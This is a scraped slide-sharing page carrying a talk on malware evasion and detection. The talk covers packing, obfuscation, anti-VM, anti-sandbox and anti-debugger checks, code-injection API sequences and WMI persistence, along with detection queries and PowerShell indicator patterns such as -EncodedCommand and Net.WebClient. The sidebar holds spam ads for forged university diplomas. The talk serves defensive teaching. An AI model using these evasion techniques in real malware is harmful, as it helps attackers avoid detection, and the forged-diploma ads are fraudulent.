一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
ytypuem
 
DSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelinesDSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelines
Timothy Spann
 
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
lzdvtmy8
 
Jio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdfJio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdf
inaya7568
 
University of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma TranscriptUniversity of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma Transcript
soxrziqu
 
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
asyed10
 
一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理
bmucuha
 
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
oaxefes
 
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
Social Samosa
 
Building a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdfBuilding a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdf
cjimenez2581
 
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
1tyxnjpia
 
Cell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docxCell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docx
vasanthatpuram
 
Build applications with generative AI on Google Cloud
Build applications with generative AI on Google CloudBuild applications with generative AI on Google Cloud
Build applications with generative AI on Google Cloud
Márton Kodok
 
End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024
Lars Albertsson
 
UofT毕业证如何办理
UofT毕业证如何办理UofT毕业证如何办理
UofT毕业证如何办理
exukyp
 
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
ihavuls
 

Recently uploaded (20)

一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
一比一原版南十字星大学毕业证(SCU毕业证书)学历如何办理
 
社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .社内勉強会資料_Hallucination of LLMs               .
社内勉強会資料_Hallucination of LLMs               .
 
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
Orchestrating the Future: Navigating Today's Data Workflow Challenges with Ai...
 
Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024Open Source Contributions to Postgres: The Basics POSETTE 2024
Open Source Contributions to Postgres: The Basics POSETTE 2024
 
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
一比一原版(曼大毕业证书)曼尼托巴大学毕业证如何办理
 
DSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelinesDSSML24_tspann_CodelessGenerativeAIPipelines
DSSML24_tspann_CodelessGenerativeAIPipelines
 
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
一比一原版格里菲斯大学毕业证(Griffith毕业证书)学历如何办理
 
Jio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdfJio cinema Retention & Engagement Strategy.pdf
Jio cinema Retention & Engagement Strategy.pdf
 
University of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma TranscriptUniversity of New South Wales degree offer diploma Transcript
University of New South Wales degree offer diploma Transcript
 
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
一比一原版美国帕森斯设计学院毕业证(parsons毕业证书)如何办理
 
一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理一比一原版(UO毕业证)渥太华大学毕业证如何办理
一比一原版(UO毕业证)渥太华大学毕业证如何办理
 
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
一比一原版卡尔加里大学毕业证(uc毕业证)如何办理
 
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
4th Modern Marketing Reckoner by MMA Global India & Group M: 60+ experts on W...
 
Building a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdfBuilding a Quantum Computer Neutral Atom.pdf
Building a Quantum Computer Neutral Atom.pdf
 
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
一比一原版(Sheffield毕业证书)谢菲尔德大学毕业证如何办理
 
Cell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docxCell The Unit of Life for NEET Multiple Choice Questions.docx
Cell The Unit of Life for NEET Multiple Choice Questions.docx
 
Build applications with generative AI on Google Cloud
Build applications with generative AI on Google CloudBuild applications with generative AI on Google Cloud
Build applications with generative AI on Google Cloud
 
End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024End-to-end pipeline agility - Berlin Buzzwords 2024
End-to-end pipeline agility - Berlin Buzzwords 2024
 
UofT毕业证如何办理
UofT毕业证如何办理UofT毕业证如何办理
UofT毕业证如何办理
 
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
原版制作(unimelb毕业证书)墨尔本大学毕业证Offer一模一样
 

Let's Talk Technical: Malware Evasion and Detection

  • 1. Let’s talk technical: Malware Evasion and Detection James Haughom Jr XOR Security
  • 2. Who am I? • Self taught cyber professional • Background in malware analysis/RE • XOR Security! • Windowless room for 10+ hours a day (SOClife) • Two degrees in music (totally relevant) • Shameless plug: http://rinseandrepeatanalysis.blogspot.com/ • Contact info: james.haughom@xorsecurity.com
  • 3. Agenda • Topics: • Malware Evasion Techniques • Detection Techniques for Defenders • Why? • Evasive malware becomes more prevalent • Defenders must follow suit • Bye bye, signature-based detection! • What I pray to God you get out of it: • Thinking outside of the box for detection • Learn about some of malware’s innerworkings
  • 4. Malware – all shapes and sizes PEs, PowerShell, and Shellcode.....oh my!
  • 5. Microsoft Office Doc Malware Weaponization: • VBA Macros / OLE Objects • DDE • Embedded link/shortcut files (.settingcontent-ms, .iqy, .slk)
  • 6. PDF Malware Weaponization: • /JavaScript • Embedded files (.exe, .settingcontent-ms, etc…) • Phishing links (boring.)
  • 7. RTF Malware Weaponization: • OLE Objects (does not support macros) • Embedded files (.exe, shellcode, etc…) • Abuses native windows executables (powershell, regsvr, bitsadmin, certutil, etc…)
  • 8. PowerShell, JavaScript, Shellcode Weaponization: • Usually embedded in other binaries • Used both for delivery and persistent payloads • Leveraged by Fileless and Evasive malware • Shellcode = PIC ready to hit the CPU
  • 9. Portable Executables • .exe / .dll • Full persistent payload on disk • Most robust form of malware • Borland, C, C++, etc… • Abuse WinAPI • Native windows functions = API Calls • Ransomware, backdoors, trojans, worms, keyloggers, rootkits, etc… Malware.exe (process) Kernell32.dll CreateFile CreateProcess CreateThread (imported) ws_32.dll socket send Recv (imported) C:WindowsSystem32 Kernel32.dll (export) Ws_32.dll (export)
  • 10. Evasion on disk, in memory, in transit..
  • 11. Static Evasion - Packing • .EXEs / .DLLs = PACKED • Packing is a subset/type of obfuscation • Compression • VMProtect, Themida, Armadillo, etc.. • High entropy/low import count • Weird static properties • APIs: • LoadLibrary • GetProcAddress • VirtualAlloc • RtlDecompressBuffer • Hides functionality of the malware • Hides strings, imports, etc… • Evade AV
  • 12. Static Evasion - Obfuscation • Non-PE malware is technically not packed, but obfuscated: • Garbage code • Pointless Arithmetic • Concatenation of important strings at runtime • Randomized variable names • Unused variables/functions • Multiple layers/languages • Replace(), chr(), Vbkey() • Simple encoding (XOR, Base64, Hex) • Compression (PowerShell) • Randomized order of functions
  • 13.
  • 14. Trojanization • Masquerading as a system process: • Svchost.exe running out of AppData • Running as a service: • Background service • Svchost.exe with malicious dll • Masquerading as downloaded software
  • 15. Environment-aware: Process activity • FindWindow API Call • GetModuleHandle • List running processes and compare: 1. Get a process listing: CreateToolhelp32Snapshot, EnumProcesses 2. Iterate through the list of processes: Process32First, Process32Next 3. Compare results of process listing • Virtualization: • VBoxService.exe, Vmtoolsd.exe, Vmwareuser.exe • Malware Lab: • procmon.exe, procexp.exe, wireshark.exe • Debuggers: • Ollydbg.exe, windbg.exe, x64dbg.exe
  • 17. File System / Registry Traverse File System Query Registry • Virtualization: • HKLMHARDWAREDEVICEMAPScsiScsi Port 0Scsi Bus 0Target Id 0Logical Unit Id 0“Identifier”;“VMWARE” • HKLMSOFTWAREVMware, Inc.VMware Tools • HKLMHARDWAREDescriptionSystem “SystemBiosVersion”;”VMWARE” • HKLMHARDWAREDescriptionSystem”SystemBios Version”;VBOX • HKLMSOFTWAREOracleVirtualBox Guest Additions • HKLMHARDWAREACPIDSDTVBOX • Malware Lab: • Residue from non-standalone tools • Virtualization: • C:WINDOWSsystem32driversVBoxMouse.sys • C:WINDOWSsystem32vboxhook.dll • C:WINDOWSsystem32vboxdisp.dll • C:Windowssystem32driversvmmouse.sys • C:system32driversvmhgfs.sys • Malware Lab: • Installation files , dependencies, dlls • Wireshark, Process Hacker, etc… • Sandbox: • Lack of data on the file system • AV: • Installation files, dependences, dlls
  • 19. Hardware • Detect Virtualization/Lab/Sandbox: • Common MAC addresses • VirtualBox - 08:00:27 • Vmware - 00:0C:29, 00:1C:14, 00:50:56, or 00:05:69 • Check RAM/Cores: • If too robust, may exit
  • 20. Sandbox • Detect Sandbox: • Check system time • Successful internet access • HttpSendRequest  google.com • Mouse/keyboard activity • Empty clipboard • Sleep loop • Malware name • Some sandboxes name the malware its hash when executing • Some sandboxes name it malware malware.exe
  • 21. Debuggers • Detect Debuggers: • Timing: • GetTickCount – if (GetTickCount1 – GetTickCount2 > x){ EXIT } • GetSystemTime if (GetSystemTime1 – GetSystemTime2 > x){ EXIT } • WinAPI Calls • IsDebuggerPresent, OutputDebugString, CheckRemoteDebugger, QueryInformationProcess • Manually checking flags within data structures • PEB – fs:[30] + 0x2 // gs:[60] + 0x2 • SeDebugPrivilege flag • Check running processes for common debuggers • ollydbg, x64dbg, immunity, etc…. • FindWindow • Parameter of ollydbg, x64dbg, etc… • Abuse of the Structured Exception Handler • TLS Callback Functions • The Red Pill
  • 22. Miscellaneous Evasion • Cleaning up after itself: • Config files, dependencies, residue, artifacts, itself, timestomping, etc.... • Evading signatures: • Randomly generate filenames or registry values • DGA – Domain Generation Algorithm • Client/server-side • Hash or refer to sections of itself to detect tampering • Arguments.callee in JS • PEs that hash sections of own code • Hide from task manager/tasklist • Unlink itself from doubly linked list  PsActiveProcessHead • Behavior dependent on other running processes • E.g. Coinminer looking for task manager • DLL Load Order Hijacking
  • 25. Code injection • Different Flavors: • Process Hollowing + Injection • CreateProcess (suspended)… • CreationFlag = 0x00000004 • UnmapViewOfSection … • WriteProcessMemory… • ResumeThread… • DLL injection • VirtualAllocEx • WriteProcessMemory • CreateRemoteThread • LoadLibrary • API Hooking • Interception/interference of code • IAT Hooking • Inline Hooking (trampoline) • Shellcode injection • Unpacking technique • Process Doppelganging
  • 26. Malware analysis for hedgehogs - http://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html
  • 28. Evasion in transit • Blending in with expected traffic: • Heavily used ports (53, 80, 443) • Benign-looking UserAgent • Less monitored by tools: • DNS is common for phoning home • Hiding comms: • Encryption • XOR • Simple encoding • DGA • C2 Redundancy • Referrer loops through domains until 200 https://www.us-cert.gov/sites/default/files/publications/MAR- 10135536-G.PDF
  • 29. Fileless…ish malware • Payload in the registry • Scripts passed to native windows executables • No files dropped to file system • PowerShell / JS • WinAPI abuse • Inject Shellcode • Uses run keys for persistence • Examples • Kovter • Poweliks • Misfox
  • 30. Fileless……………ish malware cont’d • WMI • Payload in WMI repository • No files dropped to file system • Persist across reboots • AV/EDRs will not see it • Persistence = Permanent Event Subscription (rootsubscription) • Requires: • EventFilter (trigger / condition) • EventConsumer (action / payload) • FilterToConsumerBinding (binds the two) • Examples: • Poshspy • Hammertoss
  • 32. Detecting Delivery - host • Most common delivery methods: • Malicious email attachment • Drive by download • Parent/child process relationship anomalies: • Detection: Email Attachment Drive by download Outlook.exe ..winword.exe …powershell.exe ….malware.exe iexplore.exe ..malware.exe Email Attachment Drive by download Office applications spawning powershell.exe, cmd.exe, wscript.exe, etc…. Browser spawning unexpected process (whitelist) Email Attachment Drive by download Carbon Black Tanium Windows Event Logs (4688) Carbon Black Tanium Windows Event Logs (4688) Tool(s) for Detection:
  • 33. Detection - network • UserAgent anomalies: • 1 offs • Slight deviations from expected UAs • System processes that shouldn’t be calling out • Certutil, bitsadmin, regsvr, mshta, etc… • Lack of UserAgent • Fav of malware authors = PowerShell Net.Webclient Class + Download(File|String)  Blank UA! PowerShell Net.Webclient class (blank) BITSAdmin iexplore.exe Kovter
  • 34. Detection: Process Activity • System processes behaving badly: • Running out of incorrect directory • Running under incorrect Parent Process • Anomalous DLLs • Unlinked DLLs • Anomalous network connections from system processes • DLL Load Order Hijacking
  • 35. Execution Detection: Code Injection • Anomalous process/thread activity • Cross process activity • Remote thread activity • Anomalous regions of memory (rights) • Memory protection constants • Read, Copy, Write, Execute, etc… • Code Injection protection constants: • RWX • RCX • FPs = csrss.exe, lsass.exe, svchost.exe https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
  • 36. Pattern Matching - Yara • Scanning file systems/memory with Yara signatures • Pattern match specific malware families or profile malware based off of APIs/strings • AV detections are often proprietary, don’t know what specifically makes them fire • At the perimeter or routine scans
  • 37. Detecting Persistence: Favorites • Monitoring heavily used persistence mechanisms: • (HKLM|HKCU)Software MicrosoftWindowsCurrentVersion Run • HKLMSYSTEMCurrentControlSet Services • These autorun locations should not be modified often (especially not the values under HKLM) • Scheduled Tasks • WMI
  • 38. Leveraging WMI • Use at scale for cheap (sysadmin style) • Lower visibility than most AV/EDR • Level the playing field • Anomalous process’ privileges • WMI spawns processes under PPID wmiprvse.exe
  • 39. WMI via PS • Check for: • Persistence (FilterToConsumerBinding): • gwmi -Namespace rootsubscription -Class __FilterToConsumerBinding • Trigger/Condition (EventFilter): • gwmi -Namespace rootsubscription -Class __EventFilter • Action/Payload (EventConsumer): • gwmi -Namespace rootsubscription -Class __EventConsumer • Anomalous namespaces: • gwmi -Namespace root -class __NameSpace | select name • = database of classes/instances • Anomalous classes: • gwmi -Namespace [NameSpace] -list • = managing specific objects
  • 40. Misc Detections • Clean up: • 1102: The audit log was cleared • PowerShell auditing • Get-WinEvent -LogName 'Windows PowerShell' • -EncodedCommand / -enc / -e • -nop • Net.WebClient • ‘[a-zA-Z0-9/+=]{20,}’ • -ExecutionPolicy bypass • Process relationships • Sweep for other stuff: • Mutexes, registry values, weird file types (.iqy, .slk, etc..), .pf for known bad (malware.exe.xxxx.pf) • Correlate events: • JS followed by .exe download • .exe download + Weird UA